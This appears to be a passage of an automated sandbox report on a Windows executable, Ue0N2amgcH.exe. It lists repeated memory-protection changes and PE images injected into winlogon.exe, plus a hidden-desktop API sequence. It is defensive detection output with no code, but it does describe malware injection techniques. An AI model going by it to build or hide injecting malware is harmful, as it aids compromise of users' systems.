Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D336000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D340000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D341000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D352000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D354000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D356000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D360000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D361000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D372000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D374000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D376000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D380000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D381000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D392000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D394000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D396000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D400000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D401000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D412000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D414000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D416000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D420000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D421000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D432000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D434000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D436000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D440000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D441000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D452000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D454000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D456000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D460000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D461000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D472000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D474000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D476000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D480000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D481000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D492000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D494000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D496000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D500000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D501000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D512000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D514000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D516000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D520000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D521000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D532000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D534000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D536000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D540000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D541000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D552000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D554000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D556000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D560000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D561000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D572000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D574000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D576000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D580000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D581000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D592000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D594000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D596000 protect: page execute and read and writeJump to behavior
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)Show sources
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00409EE6 OpenWindowStationA,SetProcessWindowStation,OpenDesktopA,SetThreadDesktop,CloseDesktop,CloseWindowStation,0_2_00409EE6
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C940000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C960000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C980000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D080000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D100000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D120000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D140000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D160000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D180000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D200000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D220000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D240000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D260000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D280000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D300000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D320000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D340000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D360000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D380000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D420000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D440000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D460000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D480000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D500000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D520000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D540000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D560000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D580000 value starts with: 4D5AJump to behavior
